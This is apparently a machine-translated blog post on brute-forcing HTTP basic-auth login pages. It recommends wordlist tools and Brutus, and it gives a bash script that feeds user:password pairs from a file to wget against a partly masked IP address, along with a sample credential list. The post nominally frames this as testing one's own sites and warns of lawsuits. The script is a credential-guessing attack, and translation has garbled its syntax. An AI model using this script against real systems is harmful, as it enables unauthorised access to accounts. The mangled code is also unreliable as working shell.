Brute force cracking HTTP verification web page password strength

First, you must have a decent dictionary. Go to a foreign website, or write a simple program to generate a dictionary. If you don't want to write a program, please download the dictionary generation program. (However, the wordlist on the Internet or the dictionary generated by the program using the dictionary on the Internet seems useless)

Second, you must have tools to use dictionaries to work. You can download tools from the Internet, such as the famous Brutus. The runtime interface is as follows:
　　
500) This. width = 500 "border = 0>

You can also write your own tools. I wrote a simple script to work on:

#! /Bin/bash
#
User_password_file =/root/wget_cracker_user_password
While read user_password; do
User = $ (user_password #:}
Password = $ (user_password % :}
Wget-Q-T 2-T 15 -- http-user = $ user -- http-Password = $ password-http://219.136.x.x: 8080/tool. asp
If [$? -EQ 0]; then
Echo "OK I got an password: User: $ user; Password: $ password! "
Exit 0
Fi
Done <$ user_password_file
Exit 0
-Bash-3.00 # Cat wget_cracker_user_password
ABC: adeeffaf
Deff: afkafsasf
Guest: affaewf
Guest: Guest
Guest: afdasf

Again, you should be clear: brute-force cracking is not a SYN attack, and IP spoofing is impossible. Where is your nest, the victim can see it at a glance. Therefore, make a good choice. If this is not the case, you will have a lawsuit.

Finally, I conduct HTTP verification brute-force cracking to verify the strength of the web page password protected by myself, and will never bother other websites. Remember.